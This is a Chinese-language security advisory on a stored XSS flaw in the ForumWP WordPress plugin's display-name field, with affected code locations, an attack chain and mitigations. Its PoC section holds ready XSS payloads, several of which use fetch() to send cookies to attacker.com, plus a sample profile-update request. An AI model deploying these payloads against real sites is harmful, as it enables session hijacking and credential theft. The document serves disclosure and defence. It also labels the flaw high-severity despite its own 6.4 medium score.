CVE-2025-13746 | ForumWP插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-13746

漏洞类型

存储型XSS

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

ForumWP – Forum & Discussion Board (WordPress插件)

漏洞概述

CVE-2025-13746是WordPress论坛插件ForumWP中的一个高危存储型跨站脚本(XSS)漏洞。该插件版本最高至2.1.6存在严重的安全缺陷，由于对用户显示名称(Display Name)的输入清理和输出转义不足，攻击者可以利用订阅者级别及以上的权限，在用户资料页面注入任意JavaScript代码。一旦恶意脚本被存储，任何访问包含该用户信息的页面都会触发执行，可能导致会话劫持、凭据窃取、管理员权限滥用等严重后果。由于该漏洞属于存储型XSS，其危害性远高于反射型XSS，攻击代码持久存在于服务器端，对所有访问者构成持续威胁。Wordfence安全团队于2026年1月6日披露此漏洞，建议用户立即采取修复措施。

技术细节

该漏洞的根本原因在于ForumWP插件在处理用户显示名称时未进行充分的输入验证和输出转义。具体问题出现在三个关键位置：tooltip.js文件(第25行)、class-user.php文件(第906行)和user-card.php模板文件(第57行)。攻击者只需拥有WordPress订阅者(Subscriber)角色权限，即可通过修改个人资料中的显示名称字段，注入包含恶意JavaScript代码的payload。由于插件直接将未经过滤的用户输入存储到数据库，并在后续页面渲染时直接输出到HTML中，导致恶意脚本被执行。攻击场景如下：攻击者修改显示名称为<script>alert(document.cookie)</script>，当其他用户访问该用户的个人卡片或包含其信息的页面时，浏览器会执行注入的脚本。攻击者可利用此漏洞窃取用户会话cookie、进行钓鱼攻击、修改页面内容或执行其他恶意操作。CVSS 3.1评分6.4(中危)反映了该漏洞通过网络低复杂度攻击，低权限要求但对机密性和完整性产生一定影响的特点。

攻击链分析

STEP 1

步骤1

攻击者注册WordPress账户并获得订阅者(Subscriber)级别权限

STEP 2

步骤2

攻击者访问用户资料编辑页面，准备修改显示名称字段

STEP 3

步骤3

攻击者构造恶意XSS payload注入到display_name参数中

STEP 4

步骤4

服务器未正确过滤直接存储恶意脚本到数据库

STEP 5

步骤5

当其他用户访问论坛帖子、用户卡片或任何显示该用户信息的页面时

STEP 6

步骤6

浏览器解析HTML时执行注入的JavaScript代码，导致会话劫持或数据窃取

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-13746 PoC - ForumWP Stored XSS via Display Name
// Author: Wordfence Security Team
// Target: ForumWP plugin <= 2.1.6

// Step 1: Authenticate as subscriber-level user
// Step 2: Intercept profile update request
// Step 3: Inject XSS payload in display_name field

// Example payload for display_name field:
const xssPayload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>';

// Alternative payload variants:
const altPayload1 = '" onmouseover="alert(document.cookie)" x="';
const altPayload2 = '<img src=x onerror="fetch('https://attacker.com/log?data='+btoa(document.cookie))">';
const altPayload3 = '<svg/onload=fetch(`https://attacker.com/cookie?c=${document.cookie}`)>';

// HTTP Request Example (Burp Suite format):
const httpRequest = `
POST /wp-admin/profile.php HTTP/1.1
Host: target.com
Cookie: [subscriber_session_cookie]
Content-Type: application/x-www-form-urlencoded

display_name=${encodeURIComponent(xssPayload)}&action=update
`;

console.log('XSS payload will be stored and executed on page views');
console.log('Trigger occurs when viewing user card or any page displaying the display name');

影响范围

ForumWP WordPress插件 <= 2.1.6

防御指南

临时缓解措施

在等待官方安全更新期间，建议采取以下临时缓解措施：1)限制新用户注册功能，防止攻击者创建账户；2)对现有用户显示名称进行全面审计，清理可疑内容；3)部署Web应用防火墙规则拦截包含<script>标签的请求；4)考虑暂时禁用ForumWP插件的用户卡片功能；5)加强WordPress站点的CSP策略配置，限制内联脚本执行；6)监控访问日志关注异常的JavaScript请求模式。